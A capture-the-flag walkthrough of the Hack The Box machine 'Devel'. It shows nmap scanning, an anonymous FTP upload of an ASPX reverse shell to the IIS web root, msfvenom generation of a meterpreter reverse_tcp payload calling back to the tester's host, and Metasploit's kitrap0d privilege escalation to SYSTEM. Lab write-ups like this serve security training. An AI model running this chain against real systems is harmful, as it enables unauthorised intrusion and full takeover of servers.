Devel, while relatively simple, demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.
ENUMERATION
Lets begin as always with an Nmap Scan:
target=127.0.0.1; nmap -T4 -p$(nmap -Pn -T4 $target | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -Pn -sVC $targetPORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03–18–17 01:06AM <DIR> aspnet_client
| 03–17–17 04:37PM 689 iisstart.htm
|_03–17–17 04:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsWe have access through “FTP” to the web root, just uploaded our “shell.aspx” and we got our reverse shell.
EXPLOITATION
https://github.com/josemlwdf/AutoExploits/blob/main/shell.aspx
Let’s upload our reverse shell:
ftp anonymous@10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49168|)
125 Data connection already open; Transfer starting.
03–18–17 01:06AM <DIR> aspnet_client
03–17–17 04:37PM 689 iisstart.htm
12–05–22 11:35PM 72499 img.png
12–05–22 11:36PM 2702 shell.php
03–17–17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> put /root/home/CTF/HTB/Devel/shell.aspx shell.aspx
local: /root/home/CTF/HTB/Devel/shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49169|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************************************************| 16392 6.24 MiB/s - : - ETA
226 Transfer complete.
16392 bytes sent in 00:00 (148.66 KiB/s)
ftp>Visiting our “shell.aspx” on the Web server send us the shell to our nc:
nc -nlvp 1234Listening on 0.0.0.0 1234
Connection received on 10.10.10.5 49170
Spawn Shell…
Microsoft Windows [Version 6.1.7600]
Copyright © 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami /all
whoami /all
USER INFORMATION
- - - - - - - -
User Name SID
=============== ==============================================================
iis apppool\web S-1–5–82–2971860261–2701350812–2118117159–340795515–2183480550
GROUP INFORMATION
- - - - - - - - -
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1–16–12288
Everyone Well-known group S-1–1–0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1–5–32–545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1–5–6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1–2–1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1–5–11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1–5–15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1–5–32–568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1–2–0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1–5–82–0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
- - - - - - - - - - -
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
c:\windows\system32\inetsrv>ROOT
There are several paths to get Administrator here. I wanted to use Metasploit to get it but i could have use also one of potatos.
I have created a msfvenom executable:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=1234 -f aspx > msfshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2880 bytesThen in Metasploit:
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows…
[*] 10.10.10.5–173 exploit checks are being tried…
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
...SNIP...
============================
# Name Potentially Vulnerable? Check Result
- - - - - - - - - - - - - - - - - - - - -
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
3 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
...SNIP...
[*] Post module execution completedI will use “ms10_015_kitrap0d” exploit:
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
- - - - - - - - - - - - - - - - - - - -
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
- - - - - - - - - - - - - - - - - - - -
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.19.228.121 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
- - -
0 Windows 2K SP4 - Windows 7 (x86)
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.16.9
lhost => 10.10.16.9
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Reflectively injecting payload and triggering the bug…
[*] Launching msiexec to host the DLL…
[+] Process 1188 launched.
[*] Reflectively injecting the DLL into 1188…
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.16.9:4444 -> 10.10.10.5:49163) at 2022–12–05 23:56:51 +0100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >